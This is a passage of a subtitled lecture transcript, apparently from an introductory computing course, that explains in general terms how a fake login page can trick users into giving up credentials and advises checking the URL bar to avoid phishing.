  • or get myself in trouble by actually attempting to do some phishing here.

  • But imagine instead of some HTML I had some Python code that was

  • able to read the data from that field.

  • We saw that a moment ago with passwords, right?

  • We know that the possibility exists that if the user types something

  • into a field, we have the ability to extract it.

  • What I could do here is very simple.

  • I could just read those two fields where they typed a username and a password

  • but then display this content.

  • Perhaps it's been the case that you've gone to some website

  • and seen, oh, yeah, sorry, the server can't handle this request right now,

  • or something along those lines.

  • And you maybe think nothing of it.

  • Or maybe I even would then have a link here that says, try again.

  • And if you click Try Again, it would bring you back

  • to Facebook's actual login where you would then enter your credentials

  • and try again and perhaps think everything was fine.

  • But if on this login page I had extracted your username and password

  • by tricking you into thinking you were logging into Facebook,

  • and then maybe I save those in some file somewhere

  • and then just display this to you, you think, ah, they just had an error.

  • Things are a little bit busy.

  • I'll try again.

  • And when you try again, it works.

  • It's really that easy.

  • And the way to avoid phishing expeditions, so to speak,

  • are just to be mindful of what you're doing.

  • Take a look at the URL bar to make sure that you're on the page

  • that you think you're on.

  • Hopefully you've come away now with a bit more

  • of an understanding of cybersecurity and some

  • of the best practices that are put in place to deal

  • with potential cybersecurity threats.

  • Now it's incumbent upon us to use the technology

  • that we have available to help us protect ourselves from ourselves,

  • but not only ourselves and our own data, but also working to protect our clients

  • and their data as well.

DOUG LLOYD: Now that we know a bit more about the internet and how it works,

Subtitles and vocabulary

Click the word to look it up Click the word to find further inforamtion about it